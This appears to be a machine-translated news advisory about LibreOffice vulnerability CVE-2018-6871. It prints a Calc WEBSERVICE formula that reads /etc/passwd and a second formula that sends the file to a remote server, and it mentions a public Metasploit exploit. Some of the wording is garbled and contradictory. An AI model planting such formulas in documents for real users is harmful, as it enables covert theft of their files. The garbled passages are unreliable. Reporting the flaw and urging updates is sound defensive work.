A serious vulnerability in LibreOffice: anyone can download files from your drive

The vulnerability in LibreOffice CVE-2018-6871 for versions before 5.4.5 and before 6.0.1 applies to the WEBSERVICE function used by MS Excel 2013 and MS Excel 2016, as well as LibreOffice Calc documents. This method with 100% efficiency allows invisibly for the user to inject local files into the document or send the attacker, for example, the contents of files from the Linux system " /etc/passwd " or even " /.ssh/* ". Using the same trick and protocols in the URL "ftp[:]//" or " file[:]// " is just as effective on Windows and macOS systems with LibreOffice software on vulnerable versions.

To read the contents of any file on the disk, you can use a malicious document with a commanded command:

WebService = ( "/ etc / passwd ') 

In a similar way, you can send this file to a remote server:

= WEBSERVICE ("http: // localhost: 6000 /? Q =" & WEBSERVICE ("/ etc / passwd")) 

A serious vulnerability in LibreOffice

Not only XLS documents generated by Libre Office Calc are not vulnerable. For other formats such as DOC or ODT, it is enough to embed an object from LibreOffice Calc in another document. The method has been tested and attached to the download in the form of an exploit that is publicly available ready to be imported to Metasploit.

Users of the LibreOffice office suite should update the stable version software: 5.4.5 or 6.0.1 as soon as possible.

All other LibreOffice variants, regardless of the operating system, can seriously affect the security of organizations and individual users. An attacker who sends a victim to a crafted document can obtain almost any file from the operating system. The condition is only one - to steal the file you need to know about its location and run a malicious document. For system or configuration files, this is very easy to do.

Add new comment

The content of this field is kept private and will not be shown publicly.

Learn more about our offer

If you sell security solutions, are a distributor, authorized partner or developer and would like to share your portfolio with a group of potential customers, advertise an event, software, hardware or other services on AVLab - simply write to us. Or maybe you had to deal with ransomware? We can also help you decrypt your files.
Read more

We use Google Cloud Translation and Gengo API’s to translate articles with exception of our comparative tests.